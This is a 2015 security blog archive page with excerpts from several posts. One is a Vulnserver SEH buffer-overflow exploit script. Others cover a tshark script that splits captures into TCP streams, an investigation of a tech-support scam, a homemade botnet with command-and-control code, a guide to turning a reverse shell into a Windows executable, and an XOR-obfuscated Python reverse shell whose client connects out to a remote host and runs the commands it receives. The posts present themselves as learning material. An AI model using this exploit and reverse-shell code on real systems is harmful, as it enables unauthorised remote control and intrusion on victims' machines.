Showing posts from June, 2015

Vulnserver SEH Stack Based Overflow

The script below is what I wrote following the tutorial posted by InfoSec Institute for an SEH exploit located at the following link:

#!/usr/bin/python
import socket

server = ''  # Change to the IP Address of Windows XP SP2 VM
destPort = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, destPort))

# #bufCreated = "A"*4000
# /usr/share/metasploit-framework/tools/pattern_create.rb 4000
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap…

tshark and pcapline from Wesley McGrew

I came across a situation where I wanted to separate out the TCP streams of a capture, and I found a couple of solutions that met my needs.  The first solution uses tshark; I found it at the following link and have adapted and saved the bash script below:

#!/bin/bash
# This is a script that separates a pcap into one file per TCP stream (tcp.stream)
# Adapted from the script found at

# Check to see if the argument for the pcap file has been supplied
if [ $# -eq 0 ]; then
    echo "Usage: $0 file.pcap"
    echo
    exit 1
else
    pcapFile="$1"
fi

# Create the output directory if it does not exist
outputDir="output"
if [ ! -d "$outputDir" ]; then
    mkdir "$outputDir"
fi

# Separate the streams into separate files: list every tcp.stream index,
# then write the packets matching each index to their own capture file
for stream in $(tshark -r "${pcapFile}" -T fields -e tcp.stream | sort -n | uniq)
do
    tshark -r "${pcapFile}" -w "$outputDir/stream-$stream.cap" -Y "tcp.stream eq $stream"
done
The second script was pcapline by Wesley McGre…

Miscreant Impersonating Century Link Technician - While I am Impersonating a Victim

This is a follow-up to the last post, where I talked about a friend's friend almost being victimized by scammers.  This post is meant to educate others about scams like this: the steps the miscreants walk you through to "demonstrate" that your computer is infected, and how they then collect your credit card number.

I was provided the below phone number from a friend that had a friend almost become a victim of this scam:
(844) 409-6572
I decided I would impersonate a victim who needed his computer fixed.  So I called the number and was greeted by an automated system.  Eventually a technician answered and greeted me.  He proceeded to tell me that his name is "SUMIT RASTOGI" and that he can help me fix my computer.

He had me go to which redirects to "" where I proceeded to enter the 6 digit code of 546084.  He then proceeded to tell me that he was a Jr. Technician for "Windows Online Sup…

Miscreant Impersonated Century Link Technician - What did they do?

Recently a friend came to me and asked if I would be interested in looking at one of their friends' computers.  The reason was that a miscreant, impersonating Century Link, had called and gained remote access to the computer.  With this access they proceeded to state they were fixing the computer.  After cloning the hard drive, these are the steps I took to analyze it.

First, to clone the drive I used a duplicator.  One of these can be found on Amazon for less than $100, depending on the model and the features you get.  One such model can be found at this link, and I have also included a picture below:

After the drive is cloned, I use an external enclosure to mount the drive, similar to the one at this link or below:

When you mount the drive, verify that you mount it read-only.  I am using a Debian-based Linux distribution called Kali to conduct the analysis.  Initially, when I plugged the drive in, I saw the following:

The hard drive after plugging it in showed up as /dev/sdb and it auto-mo…

Create your own Botnet and Learn How to Detect its Activity in your Defenses (Updated v0.5)

With this post I want to provide information on how a botnet operates, then provide some code that can be used to simulate the botnet in action.  Using the results, I then evaluate the defenses to see how bot activity on a network could be detected.

Remember that this is a poor man's botnet and may not simulate some of the more sophisticated botnets currently in operation.  There are security vulnerabilities in the code; do not use this in a production environment.

To begin, there are multiple components to a botnet.  The first one I will start with is the command and control server, often called a "C&C".  This is a server that is set up by the bot herder, the person who takes care of the botnet.  The term herder comes from the infected computers, or bots, following him around.  The C&C server can also be a server that was compromised and is being used for this activity.  All of the code found on this post can be downloaded from my google …

Setup pyinstaller on Windows 7

These are some quick notes on how I installed pyinstaller on Windows 7.

1. Installed Python 2.7 on Windows 7:

2. Installed the Python 2.7 for Windows Extensions:

3. Installed the Microsoft C++ for Python 2.7.

4. Installed the pip-Win to easily install packages:

5. After pip-Win is installed, a dialog box as shown in the picture below is left open. In its command box you can enter: "pip install pyinstaller"

6. After the pyinstaller package is successfully installed, from the command line you can navigate to c:\python2.7\Scripts

7. This is where you can find the pyinstaller.exe file.  You can then run it, passing it any script that has been created.  Below is a screenshot of turning my Python reverse shell script from a previous post into a Windows executable.  With the co…

Python Reverse Shell - Modified from Primal Security Blog (Updated June 5)

The following Python reverse shell is taken from the Primal Security Blog located at the following link:

I modified the code so the XOR value, port and IP addresses can be set as command-line options on the server or as options on the client.  As long as the XOR value on the client and the server match, the commands will run properly.  The modifications were based on information from the following blog:

Server Code (Victim):
#!/usr/bin/python
import socket, subprocess, sys

# Usage: server.py RHOST RPORT XORKEY (all three arguments are required)
if len(sys.argv) == 4:
    RHOST = sys.argv[1]
    RPORT = sys.argv[2]
    xorkey = sys.argv[3]
    xorkey = int(xorkey)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((RHOST, int(RPORT)))

    while True:
        # receive XOR encoded data from network socket
        data = s.recv(1024)
        # XOR the data again with a '\x41' to get back to normal data …